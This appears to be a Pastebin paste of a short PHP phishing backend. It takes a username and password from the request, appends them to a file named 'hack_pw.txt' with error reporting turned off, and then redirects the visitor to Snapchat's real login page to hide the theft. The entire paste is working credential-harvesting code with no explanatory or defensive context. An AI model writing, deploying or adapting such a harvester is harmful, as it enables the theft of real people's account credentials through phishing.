Advertisement
Guest User

Untitled

a guest
Feb 17th, 2017
116
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.42 KB | None | 0 0
  1. <?php
  2.  
  3. error_reporting(0);
  4.  
  5. $user = $_GET['username'];
  6. $password = $_GET['password'];
  7. /*$ip = $_SERVER['REMOTE_ADDR'];
  8. $fecha = date("Y-m-d;h:i:s");*/
  9.  
  10. $file = 'hack_pw.txt';
  11. $text = "
  12. User: $user
  13. Pass: $password
  14. ";
  15. file_put_contents($file, $text, FILE_APPEND | LOCK_EX);
  16.  
  17. header("Location: https://accounts.snapchat.com/accounts/login?continue=https%3A%2F%2Faccounts.snapchat.com%2Faccounts%2Fwelcome");
  18. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement